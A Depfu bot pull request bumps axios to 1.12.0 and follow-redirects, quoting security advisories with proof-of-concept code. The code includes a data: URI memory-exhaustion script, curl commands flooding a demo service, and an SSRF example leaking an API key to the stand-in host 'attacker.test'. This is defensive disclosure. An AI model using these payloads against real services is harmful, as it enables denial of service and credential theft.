Skip to content

Conversation

depfu[bot]
Copy link
Contributor

@depfu depfu bot commented Sep 11, 2025


🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!


Here is everything you need to know about this upgrade. Please take a good look at what changed and the test results before merging this pull request.

What changed?

✳️ axios (0.24.0 β†’ 1.12.0) Β· Repo Β· Changelog

Security Advisories 🚨

🚨 Axios is vulnerable to DoS attack through lack of data size check

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
let convertedData;
if (method !== 'GET') {
return settle(resolve, reject, { status: 405, ... });
}
convertedData = fromDataURI(config.url, responseType === 'blob', {
Blob: config.env && config.env.Blob
});
return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
// this example decodes ~120 MB
const base64Size = 160_000_000; // 120 MB after decoding
const base64 = 'A'.repeat(base64Size);
const uri = 'data:application/octet-stream;base64,' + base64;

console.log('Generating URI with base64 length:', base64.length);
const response = await axios.get(uri, {
responseType: 'arraybuffer'
});

console.log('Received bytes:', response.data.length);
}

main().catch(err => {
console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
timeout: 10000,
maxRedirects: 5,
httpAgent, httpsAgent,
headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
* POST /preview { "url": "<http|https|data URL>" }
* Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
*/

app.post("/preview", async (req, res) => {
const url = req.body?.url;
if (!url) return res.status(400).json({ error: "missing url" });

let u;
try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

// Developer allows using data:// in the allowlist
const allowed = new Set(["http:", "https:", "data:"]);
if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

const controller = new AbortController();
const onClose = () => controller.abort();
res.on("close", onClose);

const before = process.memoryUsage().heapUsed;

try {
const r = await axiosClient.get(u.toString(), {
responseType: "stream",
maxContentLength: 8 1024, // Axios will ignore this for data:
maxBodyLength: 8
1024, // Axios will ignore this for data:
signal: controller.signal
});

<span class="pl-c">// stream only the first 64KB back</span>
<span class="pl-k">const</span> <span class="pl-s1">cap</span> <span class="pl-c1">=</span> <span class="pl-c1">64</span> <span class="pl-c1">*</span> <span class="pl-c1">1024</span><span class="pl-kos">;</span>
<span class="pl-k">let</span> <span class="pl-s1">sent</span> <span class="pl-c1">=</span> <span class="pl-c1">0</span><span class="pl-kos">;</span>
<span class="pl-k">const</span> <span class="pl-s1">limiter</span> <span class="pl-c1">=</span> <span class="pl-k">new</span> <span class="pl-v">PassThrough</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-s1">r</span><span class="pl-kos">.</span><span class="pl-c1">data</span><span class="pl-kos">.</span><span class="pl-en">on</span><span class="pl-kos">(</span><span class="pl-s">"data"</span><span class="pl-kos">,</span> <span class="pl-kos">(</span><span class="pl-s1">chunk</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-kos">{</span>
  <span class="pl-k">if</span> <span class="pl-kos">(</span><span class="pl-s1">sent</span> <span class="pl-c1">+</span> <span class="pl-s1">chunk</span><span class="pl-kos">.</span><span class="pl-c1">length</span> <span class="pl-c1">&gt;</span> <span class="pl-s1">cap</span><span class="pl-kos">)</span> <span class="pl-kos">{</span> <span class="pl-s1">limiter</span><span class="pl-kos">.</span><span class="pl-en">end</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-s1">r</span><span class="pl-kos">.</span><span class="pl-c1">data</span><span class="pl-kos">.</span><span class="pl-en">destroy</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-kos">}</span>
  <span class="pl-k">else</span> <span class="pl-kos">{</span> <span class="pl-s1">sent</span> <span class="pl-c1">+=</span> <span class="pl-s1">chunk</span><span class="pl-kos">.</span><span class="pl-c1">length</span><span class="pl-kos">;</span> <span class="pl-s1">limiter</span><span class="pl-kos">.</span><span class="pl-en">write</span><span class="pl-kos">(</span><span class="pl-s1">chunk</span><span class="pl-kos">)</span><span class="pl-kos">;</span> <span class="pl-kos">}</span>
<span class="pl-kos">}</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-s1">r</span><span class="pl-kos">.</span><span class="pl-c1">data</span><span class="pl-kos">.</span><span class="pl-en">on</span><span class="pl-kos">(</span><span class="pl-s">"end"</span><span class="pl-kos">,</span> <span class="pl-kos">(</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-s1">limiter</span><span class="pl-kos">.</span><span class="pl-en">end</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-s1">r</span><span class="pl-kos">.</span><span class="pl-c1">data</span><span class="pl-kos">.</span><span class="pl-en">on</span><span class="pl-kos">(</span><span class="pl-s">"error"</span><span class="pl-kos">,</span> <span class="pl-kos">(</span><span class="pl-s1">e</span><span class="pl-kos">)</span> <span class="pl-c1">=&gt;</span> <span class="pl-s1">limiter</span><span class="pl-kos">.</span><span class="pl-en">destroy</span><span class="pl-kos">(</span><span class="pl-s1">e</span><span class="pl-kos">)</span><span class="pl-kos">)</span><span class="pl-kos">;</span>

<span class="pl-k">const</span> <span class="pl-s1">after</span> <span class="pl-c1">=</span> <span class="pl-s1">process</span><span class="pl-kos">.</span><span class="pl-en">memoryUsage</span><span class="pl-kos">(</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-c1">heapUsed</span><span class="pl-kos">;</span>
<span class="pl-s1">res</span><span class="pl-kos">.</span><span class="pl-en">set</span><span class="pl-kos">(</span><span class="pl-s">"x-heap-increase-mb"</span><span class="pl-kos">,</span> <span class="pl-kos">(</span><span class="pl-kos">(</span><span class="pl-s1">after</span> <span class="pl-c1">-</span> <span class="pl-s1">before</span><span class="pl-kos">)</span><span class="pl-c1">/</span><span class="pl-c1">1024</span><span class="pl-c1">/</span><span class="pl-c1">1024</span><span class="pl-kos">)</span><span class="pl-kos">.</span><span class="pl-en">toFixed</span><span class="pl-kos">(</span><span class="pl-c1">2</span><span class="pl-kos">)</span><span class="pl-kos">)</span><span class="pl-kos">;</span>
<span class="pl-s1">limiter</span><span class="pl-kos">.</span><span class="pl-en">pipe</span><span class="pl-kos">(</span><span class="pl-s1">res</span><span class="pl-kos">)</span><span class="pl-kos">;</span>

} catch (err) {
const after = process.memoryUsage().heapUsed;
res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
res.status(502).json({ error: String(err?.message || err) });
} finally {
res.off("close", onClose);
}
});

app.listen(PORT, () => {
console.log(axios-poc-link-preview listening on http://0.0.0.0:<span class="pl-s1"><span class="pl-kos">${</span><span class="pl-c1">PORT</span><span class="pl-kos">}</span></span>);
console.log(Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default <span class="pl-s1"><span class="pl-kos">${</span><span class="pl-c1">BODY_LIMIT</span><span class="pl-kos">}</span></span>).);
});

Run this app and send 3 post requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null```

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.

🚨 axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: #6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
  1. Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
  1. Run the script:
$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

🚨 axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: #6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
  1. Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
  1. Run the script:
$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

🚨 Server-Side Request Forgery in axios

axios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs.

🚨 Axios Cross-Site Request Forgery Vulnerability

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

🚨 Axios Cross-Site Request Forgery Vulnerability

An issue discovered in Axios 0.8.1 through 1.5.1 inadvertently reveals the confidential XSRF-TOKEN stored in cookies by including it in the HTTP header X-XSRF-TOKEN for every request made to any host allowing attackers to view sensitive information.

Release Notes

Too many releases to show here. View the full release notes.

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

↗️ follow-redirects (indirect, 1.14.5 β†’ 1.15.11) Β· Repo

Security Advisories 🚨

🚨 follow-redirects' Proxy-Authorization header kept across hosts

When using axios, its dependency follow-redirects only clears authorization header during cross-domain redirect, but allows the proxy-authentication header which contains credentials too.

Steps To Reproduce & PoC

Test code:

const axios = require('axios');

axios.get('http://127.0.0.1:10081/', {
headers: {
'AuThorization': 'Rear Test',
'ProXy-AuthoriZation': 'Rear Test',
'coOkie': 't=1'
}
})
.then((response) => {
console.log(response);
})

When I meet the cross-domain redirect, the sensitive headers like authorization and cookie are cleared, but proxy-authentication header is kept.

Impact

This vulnerability may lead to credentials leak.

Recommendations

Remove proxy-authentication header during cross-domain redirect

Recommended Patch

follow-redirects/index.js:464

- removeMatchingHeaders(/^(?:authorization|cookie)$/i, this._options.headers);
+ removeMatchingHeaders(/^(?:authorization|proxy-authorization|cookie)$/i, this._options.headers);

🚨 Follow Redirects improperly handles URLs in the url.parse() function

Versions of the package follow-redirects before 1.15.4 are vulnerable to Improper Input Validation due to the improper handling of URLs by the url.parse() function. When new URL() throws an error, it can be manipulated to misinterpret the hostname. An attacker could exploit this weakness to redirect traffic to a malicious site, potentially leading to information disclosure, phishing attacks, or other security breaches.

🚨 Exposure of Sensitive Information to an Unauthorized Actor in follow-redirects

Exposure of Sensitive Information to an Unauthorized Actor in NPM follow-redirects prior to 1.14.8.

🚨 Exposure of sensitive information in follow-redirects

follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor

Commits

See the full diff on Github. The new version differs by more commits than we can show here.

πŸ†• asynckit (added, 0.4.0)

πŸ†• call-bind-apply-helpers (added, 1.0.2)

πŸ†• combined-stream (added, 1.0.8)

πŸ†• delayed-stream (added, 1.0.0)

πŸ†• dunder-proto (added, 1.0.1)

πŸ†• es-define-property (added, 1.0.1)

πŸ†• es-errors (added, 1.3.0)

πŸ†• es-object-atoms (added, 1.1.1)

πŸ†• es-set-tostringtag (added, 2.1.0)

πŸ†• form-data (added, 4.0.4)

πŸ†• get-proto (added, 1.0.1)

πŸ†• gopd (added, 1.2.0)

πŸ†• has-tostringtag (added, 1.0.2)

πŸ†• hasown (added, 2.0.2)

πŸ†• math-intrinsics (added, 1.1.0)

πŸ†• proxy-from-env (added, 1.1.0)


πŸ‘‰ No CI detected

You don't seem to have any Continuous Integration service set up!

Without a service that will test the Depfu branches and pull requests, we can't inform you if incoming updates actually work with your app. We think that this degrades the service we're trying to provide down to a point where it is more or less meaningless.

This is fine if you just want to give Depfu a quick try. If you want to really let Depfu help you keep your app up-to-date, we recommend setting up a CI system:

* [Circle CI](https://circleci.com), [Semaphore ](https://semaphoreci.com) and [Github Actions](https://docs.github.com/actions) are all excellent options. * If you use something like Jenkins, make sure that you're using the Github integration correctly so that it reports status data back to Github. * If you have already set up a CI for this repository, you might need to check your configuration. Make sure it will run on all new branches. If you don’t want it to run on every branch, you can whitelist branches starting with `depfu/`.

Depfu Status

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands
@​depfu rebase
Rebases against your default branch and redoes this update
@​depfu recreate
Recreates this PR, overwriting any edits that you've made to it
@​depfu merge
Merges this PR once your tests are passing and conflicts are resolved
@​depfu cancel merge
Cancels automatic merging of this PR
@​depfu close
Closes this PR and deletes the branch
@​depfu reopen
Restores the branch and reopens this PR (if it's closed)
@​depfu pause
Ignores all future updates for this dependency and closes this PR
@​depfu pause [minor|major]
Ignores all future minor/major updates for this dependency and closes this PR
@​depfu resume
Future versions of this dependency will create PRs again (leaves this PR as is)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging this pull request may close these issues.

0 participants